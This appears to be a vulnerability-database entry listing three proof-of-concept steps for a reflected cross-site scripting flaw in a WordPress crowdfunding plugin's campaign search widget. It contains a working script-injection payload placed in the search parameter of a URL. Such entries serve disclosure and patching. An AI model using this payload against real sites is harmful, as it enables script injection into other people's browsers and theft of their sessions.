## https://sploitus.com/exploit?id=WPEX-ID:CA7B6A39-A910-4B4F-B9CC-BE444EC44942
1. Add a "Campaign Search" widget to your site (via Appearance > Customise > Widgets for example)
2. Access the URL: https://www.example.com/?s="><script>alert(/XSS/)</script>&post_type=product&product_type=croudfunding
3. See the XSS.